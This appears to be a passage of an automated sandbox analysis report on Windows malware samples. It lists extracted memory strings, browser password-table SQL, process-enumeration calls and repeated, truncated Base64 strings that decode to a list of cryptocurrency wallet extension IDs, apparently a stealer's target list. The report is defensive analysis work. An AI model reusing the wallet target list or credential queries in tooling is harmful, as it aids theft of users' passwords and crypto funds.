Source: real.exe, 00000017.00000002.552952674.00000000270FD000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000017.00000002.568377995.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.685831619.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.671019901.000000002774C000.00000004.00000800.00020000.00000000.sdmp, me.exe, 0000001D.00000002.742790849.000000006096F000.00000002.00000001.00020000.00000000.sdmp, me.exe, 0000001D.00000002.727644936.0000000026EC5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: real.exe, 00000017.00000002.552952674.00000000270FD000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000017.00000002.568377995.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.685831619.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.671019901.000000002774C000.00000004.00000800.00020000.00000000.sdmp, me.exe, 0000001D.00000002.742790849.000000006096F000.00000002.00000001.00020000.00000000.sdmp, me.exe, 0000001D.00000002.727644936.0000000026EC5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: real.exe, 00000017.00000002.552952674.00000000270FD000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000017.00000002.568377995.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.685831619.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.671019901.000000002774C000.00000004.00000800.00020000.00000000.sdmp, me.exe, 0000001D.00000002.742790849.000000006096F000.00000002.00000001.00020000.00000000.sdmp, me.exe, 0000001D.00000002.727644936.0000000026EC5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: real.exe, 00000017.00000002.552952674.00000000270FD000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000017.00000002.568377995.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.685831619.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.671019901.000000002774C000.00000004.00000800.00020000.00000000.sdmp, me.exe, 0000001D.00000002.742790849.000000006096F000.00000002.00000001.00020000.00000000.sdmp, me.exe, 0000001D.00000002.727644936.0000000026EC5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: real.exe, 00000017.00000002.552952674.00000000270FD000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000017.00000002.568377995.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.685831619.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.671019901.000000002774C000.00000004.00000800.00020000.00000000.sdmp, me.exe, 0000001D.00000002.742790849.000000006096F000.00000002.00000001.00020000.00000000.sdmp, me.exe, 0000001D.00000002.727644936.0000000026EC5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: real.exe, 00000017.00000002.552952674.00000000270FD000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000017.00000002.568377995.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.685831619.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.671019901.000000002774C000.00000004.00000800.00020000.00000000.sdmp, me.exe, 0000001D.00000002.742790849.000000006096F000.00000002.00000001.00020000.00000000.sdmp, me.exe, 0000001D.00000002.727644936.0000000026EC5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: real.exe, 00000017.00000002.552952674.00000000270FD000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000017.00000002.568377995.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.685831619.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.671019901.000000002774C000.00000004.00000800.00020000.00000000.sdmp, me.exe, 0000001D.00000002.742790849.000000006096F000.00000002.00000001.00020000.00000000.sdmp, me.exe, 0000001D.00000002.727644936.0000000026EC5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: F0geI.exe, 0000000F.00000003.415196008.0000000003DB4000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.772202886.000000000462E000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.776917109.00000000043A3000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.602574109.00000000011C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: real.exe, 00000017.00000002.552952674.00000000270FD000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000017.00000002.568377995.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.685831619.000000006096F000.00000002.00001000.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.671019901.000000002774C000.00000004.00000800.00020000.00000000.sdmp, me.exe, 0000001D.00000002.742790849.000000006096F000.00000002.00000001.00020000.00000000.sdmp, me.exe, 0000001D.00000002.727644936.0000000026EC5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Code function: 15_2_0040A1FE CreateToolhelp32Snapshot,Process32First,Process32Next,

15_2_0040A1FE

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\

Source: namdoitntn.exe.0.dr, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: jshainx.exe.0.dr, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: 21.0.namdoitntn.exe.9f0000.0.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: 25.0.jshainx.exe.a90000.0.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5